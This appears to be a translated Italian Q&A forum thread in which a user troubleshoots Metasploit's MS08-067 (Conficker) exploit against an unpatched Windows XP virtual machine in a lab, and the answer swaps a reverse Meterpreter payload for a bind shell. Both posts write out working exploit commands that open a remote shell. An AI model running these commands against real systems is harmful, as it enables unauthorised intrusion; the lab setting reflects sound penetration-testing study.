Utilizzare Metasploit per sfruttare SMB tramite Conficker

1

Ho un SP0 / un Windows XP non aggiornato che è vulnerabile al worm Conficker. Sto usando metasploit per usare l'exploit Conficker con lo scopo di aprire una shell remota / riga di comando.

Il mio script Metasploit è il seguente:

use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z

Nel mio caso, ho macchine con indirizzo in 192.168.239.* e LPORT = 443 .

In questo modo, dovrei essere in grado di aprire una sessione con la macchina vulnerabile remota ( sessions -i 1 ), eseguendo quindi l'applicazione della riga di comando ( execute -i -f cmd.exe ) e ottenendo una linea di comando remota.

Tuttavia, quando eseguo la sceneggiatura, sebbene induca Meterpreter ad aprire una sessione con la vittima, questa sessione è chiusa (Motivo: muore) dopo pochi secondi.

Ho trovato che potrebbe essere correlato al fatto che sto usando due macchine virtuali VMWare durante il mio test .
Come suggerito, ho provato con set InitialAutoRunScript migrate -f , ma non cambia nulla.

Come posso evitare che le sessioni di Meterpreter siano chiuse?
E, soprattutto, perché sono chiusi?

    
posta auino 17.12.2013 - 11:25
fonte

1 risposta

1

Ho risolto variando il carico utile utilizzato da Metasploit. In particolare, utilizzando bind_tcp payload le connessioni Meterpreter non vengono più chiuse dopo pochi secondi e ottengo una shell remota / riga di comando.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp
set RHOST <vulnerable_win_xp_ip>
show targets
set TARGET <n>
run

Nel mio caso <n> = 2 , ma in generale dipende dal passaggio precedente.

    
risposta data 18.12.2013 - 16:59
fonte

Leggi altre domande sui tag